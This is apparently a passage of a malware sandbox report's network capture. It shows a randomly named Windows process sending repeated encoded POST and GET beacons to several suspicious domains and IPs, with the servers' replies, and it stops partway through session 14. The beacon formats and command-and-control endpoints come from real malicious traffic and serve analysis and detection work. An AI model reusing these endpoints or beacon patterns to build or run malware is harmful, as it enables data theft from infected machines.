                                                            Data Ascii: 941 216 296v4c0 6.627 5.373 12 12 12h56c6.627 0 12-5.373 12-12v-1.333c0-28.462 83.186-29.647 83.186-106.667 0-58.002-60.165-102-116.531-102zM256 338c-25.365 0-46 20.635-46 46 0 25.364 20.635 46 46 46s46-20.636 46-46c0-25.365-20.635-46-46-46z"
                                                            Jan 10, 2025 22:05:23.195693970 CET | 250 | IN |
                                                            Data Ascii: <p>Oops! We couldn't find the page that you're looking for.</p><p>Please check the address and try again.</p><section class="footer"><strong>Error Code:</strong> 404</section></div></div></div></div></body><


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            1 | 192.168.2.11 | 49718 | 107.155.56.30 | 80 | 5420 | C:\Program Files (x86)\PBaHAVgANOERWIReYLjHxBClcfYyZuzkoiTkaAPbEgcJWaCCdprdMTQzICy\EPnOHZVVNotZ.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Jan 10, 2025 22:05:39.082874060 CET | 804 | OUT | POST /2gcl/ HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.9
                                                            Accept-Encoding: gzip, deflate, br
                                                            Host: www.expancz.top
                                                            Origin: http://www.expancz.top
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Content-Length: 202
                                                            Cache-Control: max-age=0
                                                            Referer: http://www.expancz.top/2gcl/
                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1055 Build/LPA23.12-21-1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                            Data Ascii: gtL8P=4KMMWvJXtNIDx3KzsoqEZdth1vBXWqHUXTu9E+YPPeEpuAJIzLvsGbb+1xzxQVc8tMVkU8ba4IkF3MDc1tJoAuzZ6gENTRoiemeONY/pcTgIRfXriJT72uF0eHBSwvmxOwqvqp4aTYKynoMienfBG6MeY+cP4pkLTC0yZQ2moYdB6JFlt6SXwwT0jqxcc2JtnQ==
                                                            Jan 10, 2025 22:05:40.030945063 CET | 697 | IN | HTTP/1.1 405 Not Allowed
                                                            Server: nginx
                                                            Date: Fri, 10 Jan 2025 21:05:39 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 552
                                                            Connection: close
                                                            Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            2 | 192.168.2.11 | 49719 | 107.155.56.30 | 80 | 5420 | C:\Program Files (x86)\PBaHAVgANOERWIReYLjHxBClcfYyZuzkoiTkaAPbEgcJWaCCdprdMTQzICy\EPnOHZVVNotZ.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Jan 10, 2025 22:05:41.634426117 CET | 824 | OUT | POST /2gcl/ HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.9
                                                            Accept-Encoding: gzip, deflate, br
                                                            Host: www.expancz.top
                                                            Origin: http://www.expancz.top
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Content-Length: 222
                                                            Cache-Control: max-age=0
                                                            Referer: http://www.expancz.top/2gcl/
                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1055 Build/LPA23.12-21-1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                            Data Ascii: gtL8P=4KMMWvJXtNIDyWazqJqEb9tiwvBXY6HQXUm9E/dKPsgpgCRIyOTsI7b++Rz0UVc7tMYZU4ba4MEF3IPc1ehnDezbhQEPMhoiemeONYDPcSIIRsPrw9H41uF3ZHBS0vmLOwqdqokwTayynsAie2fCRKMEc+cZ2KNlbCVCcxSLhIJ5yvI/9ZbAzjb23MQsVHsk8dIXRGBQolc/f3UWyp+zbHI=
                                                            Jan 10, 2025 22:05:42.564593077 CET | 697 | IN | HTTP/1.1 405 Not Allowed
                                                            Server: nginx
                                                            Date: Fri, 10 Jan 2025 21:05:42 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 552
                                                            Connection: close
                                                            Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            3 | 192.168.2.11 | 49720 | 107.155.56.30 | 80 | 5420 | C:\Program Files (x86)\PBaHAVgANOERWIReYLjHxBClcfYyZuzkoiTkaAPbEgcJWaCCdprdMTQzICy\EPnOHZVVNotZ.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Jan 10, 2025 22:05:44.365710974 CET | 1837 | OUT | POST /2gcl/ HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.9
                                                            Accept-Encoding: gzip, deflate, br
                                                            Host: www.expancz.top
                                                            Origin: http://www.expancz.top
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Content-Length: 1234
                                                            Cache-Control: max-age=0
                                                            Referer: http://www.expancz.top/2gcl/
                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1055 Build/LPA23.12-21-1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                            Data Ascii: gtL8P= [TRUNCATED]
                                                            Jan 10, 2025 22:05:45.117206097 CET | 697 | IN | HTTP/1.1 405 Not Allowed
                                                            Server: nginx
                                                            Date: Fri, 10 Jan 2025 21:05:44 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 552
                                                            Connection: close
                                                            Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            4 | 192.168.2.11 | 49721 | 107.155.56.30 | 80 | 5420 | C:\Program Files (x86)\PBaHAVgANOERWIReYLjHxBClcfYyZuzkoiTkaAPbEgcJWaCCdprdMTQzICy\EPnOHZVVNotZ.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Jan 10, 2025 22:05:46.911207914 CET | 543 | OUT | GET /2gcl/?gtL8P=1IksVaFM1cAemyK05p+hJvI89YFPTpbYdVbJCfEKBOY5tDFEgZGIVLfooGjxZE8Rq+UWfqPa15shq7PO0tNmdZfz0RhpRCYzUVnPO/bDdiFFJaWY/Yn51Jw=&FZg8n=jDOt606X1jh HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.9
                                                            Host: www.expancz.top
                                                            Connection: close
                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1055 Build/LPA23.12-21-1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                            Jan 10, 2025 22:05:47.835131884 CET | 1236 | IN | HTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Fri, 10 Jan 2025 21:05:47 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 9651
                                                            Last-Modified: Fri, 15 Nov 2024 02:47:44 GMT
                                                            Connection: close
                                                            Vary: Accept-Encoding
                                                            ETag: "6736b650-25b3"
                                                            Accept-Ranges: bytes
                                                            Data Ascii: <!DOCTYPE html><html><head><meta charset=utf-8><meta name=viewport content="width=device-width,initial-scale=1,maximum-scale=1,minimum-scale=1,user-scalable=no"><meta name=keywords content=""><meta name=description content=""><meta property=og:type content=website><meta property=og:title content=""><meta property=og:description content=""><meta property=og:url content=""><meta property=og:image content=""><meta name=HandheldFriendly content=true><meta name=apple-mobile-web-app-capable content=yes><meta name=apple-mobile-web-app-status-bar-style content=black><meta name=format-detection content="telphone=no, email=no"><meta name=screen-orientation content=portrait><meta name=x5-orientation content=portrait><meta name=full-screen content=yes><meta name=x5-fullscreen content=true><meta name=browsermode content=application><meta name=x5-page-mode content=app><meta name=msapplication-tap-highlight content=no><meta http-equiv=X-UA-Compatible content="ie=edge"><link href=https:
                                                            Jan 10, 2025 22:05:47.835191011 CET | 1236 | IN |
                                                            Data Ascii: //l3filejson4dvd.josyliving.com/favicon.ico type=image/x-icon rel=icon><style>#POP800_INIT_DIV { display: none!important; } #POP800_PANEL_DIV { display: none!important; } #POP800_LEAVEWORD_DIV { display: none!
                                                            Jan 10, 2025 22:05:47.835226059 CET | 1236 | IN |
                                                            Data Ascii: xmlHttp = new ActiveXObject("Microsoft.XMLHTTP"); } }else if(window.XMLHttpRequest){ //FirefoxOpera 8.0+SafariChrome xmlHttp = new XMLHttpRequest(); } /
                                                            Jan 10, 2025 22:05:47.835263014 CET | 1236 | IN |
                                                            Data Ascii: myBody.appendChild(myScript); return true; }else{ return false; } }else{ return false; } } var pathInfo = ''; var baseJsUrl = isAtm ? 'https://dq0ib5xlct7tw.cloudfron
                                                            Jan 10, 2025 22:05:47.835295916 CET | 1236 | IN |
                                                            Data Ascii: .toString(16).substring(1); } function guid() { return (S4()+S4()+"-"+S4()+"-"+S4()+"-"+S4()+"-"+S4()+S4()+S4()); } if(!sessionStorage.sessionId) { sessionStorage.sessionId = guid(); }</script><script>if(localSt
                                                            Jan 10, 2025 22:05:47.835355997 CET | 1236 | IN |
                                                            Data Ascii: } if(localStorage.source === sourceData.tikTokSource) { ! function(w, d, t) { w.TiktokAnalyticsObject = t; var ttq = w[t] = w[t] || []; ttq.methods = ["page", "track", "identify", "instances", "debug", "on
                                                            Jan 10, 2025 22:05:47.835390091 CET | 1236 | IN |
                                                            Data Ascii: t.getElementsByTagName("script")[0]; a.parentNode.insertBefore(o, a) }; ttq.load(fb_id || 'C5T758KFMUHRC7DGN9U0'); ttq.track('PageView'); }(window, document, 'ttq'); } else { ttq = { tr
                                                            Jan 10, 2025 22:05:47.835428953 CET | 1236 | IN |
                                                            Data Ascii: =function(p){y([p])};y(c)}catch(e){}};var scr=d.getElementsByTagName(t)[0],par=scr.parentNode;par.insertBefore(s,scr)})(window,document,"script","https://s.yimg.com/wi/ytc.js","dotq"); }</script><title></title><script>window.onload = funct
                                                            Jan 10, 2025 22:05:47.835459948 CET | 14 | IN |
                                                            Data Ascii: </body></html>


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            5 | 192.168.2.11 | 49722 | 18.139.62.226 | 80 | 5420 | C:\Program Files (x86)\PBaHAVgANOERWIReYLjHxBClcfYyZuzkoiTkaAPbEgcJWaCCdprdMTQzICy\EPnOHZVVNotZ.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Jan 10, 2025 22:05:53.514230013 CET | 831 | OUT | POST /y49d/ HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.9
                                                            Accept-Encoding: gzip, deflate, br
                                                            Host: www.taxiquynhonnew.click
                                                            Origin: http://www.taxiquynhonnew.click
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Content-Length: 202
                                                            Cache-Control: max-age=0
                                                            Referer: http://www.taxiquynhonnew.click/y49d/
                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1055 Build/LPA23.12-21-1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                            Data Ascii: gtL8P=r4rKcibVSx4vBQRZBwBaNoLvbBNGhs+G/PHzvokdAncuO7K4XAXhJXpnz63f//TzIM4SVG09rhp4coRzSgDjen+Cj1O8jeUc2ciuXrdeaVTYwroIx9J5S+2qdSqUfBtYdv3W8RrYUQWV6Mg7QYIYgUywznvmG9dQkEXV4LfvXC5GHSIir/SqhdUFffwg7hAKrA==
                                                            Jan 10, 2025 22:05:54.440963030 CET | 371 | IN | HTTP/1.1 301 Moved Permanently
                                                            Server: openresty
                                                            Date: Fri, 10 Jan 2025 21:05:54 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 166
                                                            Connection: close
                                                            Location: https://www.taxiquynhonnew.click/y49d/
                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            6 | 192.168.2.11 | 49723 | 18.139.62.226 | 80 | 5420 | C:\Program Files (x86)\PBaHAVgANOERWIReYLjHxBClcfYyZuzkoiTkaAPbEgcJWaCCdprdMTQzICy\EPnOHZVVNotZ.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Jan 10, 2025 22:05:56.068679094 CET | 851 | OUT | POST /y49d/ HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.9
                                                            Accept-Encoding: gzip, deflate, br
                                                            Host: www.taxiquynhonnew.click
                                                            Origin: http://www.taxiquynhonnew.click
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Content-Length: 222
                                                            Cache-Control: max-age=0
                                                            Referer: http://www.taxiquynhonnew.click/y49d/
                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1055 Build/LPA23.12-21-1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                            Data Ascii: gtL8P=r4rKcibVSx4vTgBZNzpaKILsVhNGrM+K/PLzvqINAx0uOZi4NEDhH3pnnq3WivT6IM0kVEw9rh94ct1zVSrie3+EqVO+8OUc2ciuXrJ4aR/Ywb4IxY9+MO2rQCqUbBtcdv308UzhUT+V6Mw7epIbz0y29HvtIf8/o3Sr16TCWS9VGUF47cb9iOcHL5RQyQlDwHtHSsVMoGtlbpIC1Tibp/I=
                                                            Jan 10, 2025 22:05:56.994529009 CET | 371 | IN | HTTP/1.1 301 Moved Permanently
                                                            Server: openresty
                                                            Date: Fri, 10 Jan 2025 21:05:56 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 166
                                                            Connection: close
                                                            Location: https://www.taxiquynhonnew.click/y49d/
                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            7 | 192.168.2.11 | 49724 | 18.139.62.226 | 80 | 5420 | C:\Program Files (x86)\PBaHAVgANOERWIReYLjHxBClcfYyZuzkoiTkaAPbEgcJWaCCdprdMTQzICy\EPnOHZVVNotZ.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Jan 10, 2025 22:05:58.946949005 CET | 1864 | OUT | POST /y49d/ HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.9
                                                            Accept-Encoding: gzip, deflate, br
                                                            Host: www.taxiquynhonnew.click
                                                            Origin: http://www.taxiquynhonnew.click
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Content-Length: 1234
                                                            Cache-Control: max-age=0
                                                            Referer: http://www.taxiquynhonnew.click/y49d/
                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1055 Build/LPA23.12-21-1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                            Jan 10, 2025 22:05:59.836528063 CET | 371 | IN | HTTP/1.1 301 Moved Permanently
                                                            Server: openresty
                                                            Date: Fri, 10 Jan 2025 21:05:59 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 166
                                                            Connection: close
                                                            Location: https://www.taxiquynhonnew.click/y49d/
                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            8 | 192.168.2.11 | 49725 | 18.139.62.226 | 80 | 5420 | C:\Program Files (x86)\PBaHAVgANOERWIReYLjHxBClcfYyZuzkoiTkaAPbEgcJWaCCdprdMTQzICy\EPnOHZVVNotZ.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Jan 10, 2025 22:06:01.520277977 CET | 552 | OUT | GET /y49d/?gtL8P=m6DqfWTYFUU8GAEJaQ04TZKKVQt9iuan9ImFwYYAXgcLCIKDKHWgUkMantPJ7uipU91pPV1usxBfeqldUzKMcDyYrnyrhYUq4o7lYpBsWzTksb8l1Yx6Eo8=&FZg8n=jDOt606X1jh HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.9
                                                            Host: www.taxiquynhonnew.click
                                                            Connection: close
                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1055 Build/LPA23.12-21-1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                            Jan 10, 2025 22:06:02.464771986 CET | 516 | IN | HTTP/1.1 301 Moved Permanently
                                                            Server: openresty
                                                            Date: Fri, 10 Jan 2025 21:06:02 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 166
                                                            Connection: close
                                                            Location: https://www.taxiquynhonnew.click/y49d/?gtL8P=m6DqfWTYFUU8GAEJaQ04TZKKVQt9iuan9ImFwYYAXgcLCIKDKHWgUkMantPJ7uipU91pPV1usxBfeqldUzKMcDyYrnyrhYUq4o7lYpBsWzTksb8l1Yx6Eo8=&FZg8n=jDOt606X1jh
                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            9 | 192.168.2.11 | 49726 | 209.74.77.107 | 80 | 5420 | C:\Program Files (x86)\PBaHAVgANOERWIReYLjHxBClcfYyZuzkoiTkaAPbEgcJWaCCdprdMTQzICy\EPnOHZVVNotZ.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Jan 10, 2025 22:06:15.651770115 CET | 819 | OUT | POST /a6qk/ HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.9
                                                            Accept-Encoding: gzip, deflate, br
                                                            Host: www.learnwithus.site
                                                            Origin: http://www.learnwithus.site
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Content-Length: 202
                                                            Cache-Control: max-age=0
                                                            Referer: http://www.learnwithus.site/a6qk/
                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1055 Build/LPA23.12-21-1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                            Data Ascii: gtL8P=XG0+arhlWzDjMhH+qbyveYVfu1mObRqaLf0coYeirQxhPGYQAn56p+IJSUZAuj0awIjmMP9vzF0RHmV012jwddw7eI+qqg+GWpUwb976vdMoH/iCe8YKNpY3G4s5ACZdEg/bx0J5j5PaLXbmgOYcPOcXNDi4Q8JzwkNSnmSNON78oqE5pJ+d/FReZ2pQs3jcVg==
                                                            Jan 10, 2025 22:06:16.294430971 CET | 533 | IN | HTTP/1.1 404 Not Found
                                                            Date: Fri, 10 Jan 2025 21:06:16 GMT
                                                            Server: Apache
                                                            Content-Length: 389
                                                            Connection: close
                                                            Content-Type: text/html
                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            10 | 192.168.2.11 | 49727 | 209.74.77.107 | 80 | 5420 | C:\Program Files (x86)\PBaHAVgANOERWIReYLjHxBClcfYyZuzkoiTkaAPbEgcJWaCCdprdMTQzICy\EPnOHZVVNotZ.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Jan 10, 2025 22:06:18.205348969 CET | 839 | OUT | POST /a6qk/ HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.9
                                                            Accept-Encoding: gzip, deflate, br
                                                            Host: www.learnwithus.site
                                                            Origin: http://www.learnwithus.site
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Content-Length: 222
                                                            Cache-Control: max-age=0
                                                            Referer: http://www.learnwithus.site/a6qk/
                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1055 Build/LPA23.12-21-1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                            Data Ascii: gtL8P=XG0+arhlWzDjPB3+o8evVYVYr1mOABqeLf4cod+yriVhPnIQBm56o+IJGEZFhD0vwInUMORvzEQRHjR01FLzHtw5LY+kug+GWpUwb9HcvdUoHPyCddYFEJY0RIs5LiYaEg/tx1lDj63aLWrmlPYfFOcRDjjVROkmzUotjVSrN/3wkMJj5q3K8WZcNQIglGGVOk45a9n3r2cVRfZ7VgDVXFw=
                                                            Jan 10, 2025 22:06:18.785733938 CET | 533 | IN | HTTP/1.1 404 Not Found
                                                            Date: Fri, 10 Jan 2025 21:06:18 GMT
                                                            Server: Apache
                                                            Content-Length: 389
                                                            Connection: close
                                                            Content-Type: text/html
                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            11 | 192.168.2.11 | 49728 | 209.74.77.107 | 80 | 5420 | C:\Program Files (x86)\PBaHAVgANOERWIReYLjHxBClcfYyZuzkoiTkaAPbEgcJWaCCdprdMTQzICy\EPnOHZVVNotZ.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Jan 10, 2025 22:06:20.755026102 CET | 1852 | OUT | POST /a6qk/ HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.9
                                                            Accept-Encoding: gzip, deflate, br
                                                            Host: www.learnwithus.site
                                                            Origin: http://www.learnwithus.site
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Content-Length: 1234
                                                            Cache-Control: max-age=0
                                                            Referer: http://www.learnwithus.site/a6qk/
                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1055 Build/LPA23.12-21-1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                            Jan 10, 2025 22:06:21.321096897 CET | 533 | IN | HTTP/1.1 404 Not Found
                                                            Date: Fri, 10 Jan 2025 21:06:21 GMT
                                                            Server: Apache
                                                            Content-Length: 389
                                                            Connection: close
                                                            Content-Type: text/html
                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            12 | 192.168.2.11 | 49729 | 209.74.77.107 | 80 | 5420 | C:\Program Files (x86)\PBaHAVgANOERWIReYLjHxBClcfYyZuzkoiTkaAPbEgcJWaCCdprdMTQzICy\EPnOHZVVNotZ.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Jan 10, 2025 22:06:23.295053959 CET | 548 | OUT | GET /a6qk/?FZg8n=jDOt606X1jh&gtL8P=aEceZcxMCBryYHP5wuuxALE/nyOJEnW8Dq1kpoaXpw1kPmwya2N1uoUJGmxyu00sisqpLeUFyGY8IB1P90PsZd1kcaOBiz2wX9gnM6j3y9U4T6bwB9wKCO8= HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.9
                                                            Host: www.learnwithus.site
                                                            Connection: close
                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1055 Build/LPA23.12-21-1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                            Jan 10, 2025 22:06:23.880858898 CET | 548 | IN | HTTP/1.1 404 Not Found
                                                            Date: Fri, 10 Jan 2025 21:06:23 GMT
                                                            Server: Apache
                                                            Content-Length: 389
                                                            Connection: close
                                                            Content-Type: text/html; charset=utf-8
                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            13 | 192.168.2.11 | 49730 | 154.205.156.26 | 80 | 5420 | C:\Program Files (x86)\PBaHAVgANOERWIReYLjHxBClcfYyZuzkoiTkaAPbEgcJWaCCdprdMTQzICy\EPnOHZVVNotZ.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Jan 10, 2025 22:06:29.046247005 CET | 807 | OUT | POST /ao44/ HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.9
                                                            Accept-Encoding: gzip, deflate, br
                                                            Host: www.jijievo.site
                                                            Origin: http://www.jijievo.site
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Content-Length: 202
                                                            Cache-Control: max-age=0
                                                            Referer: http://www.jijievo.site/ao44/
                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1055 Build/LPA23.12-21-1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                            Data Ascii: gtL8P=N+H2SkqD1kU55OJ+6uhVWH/Lx+z3Kj7NJCSNWDuHSuWo1Cc9D2u5Rd5lFh/ogveHEcvRsZEuYs6ByKCiyFXQB6ySRnTxiuTSF+xMOPRpY3RSb52Aflc0LuU7yz11mzd9vLm4yQeSAvCF5rs5ByYFpKZlrO7GO0U3gC2xd1piBzOV+YegpN2xFNnZXXv9jwDcLw==


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            14 | 192.168.2.11 | 49731 | 154.205.156.26 | 80 | 5420 | C:\Program Files (x86)\PBaHAVgANOERWIReYLjHxBClcfYyZuzkoiTkaAPbEgcJWaCCdprdMTQzICy\EPnOHZVVNotZ.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Jan 10, 2025 22:06:31.822845936 CET | 827 | OUT | POST /ao44/ HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.9
                                                            Accept-Encoding: gzip, deflate, br
                                                            Host: www.jijievo.site
                                                            Origin: http://www.jijievo.site
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Content-Length: 222
                                                            Cache-Control: max-age=0
                                                            Referer: http://www.jijievo.site/ao44/
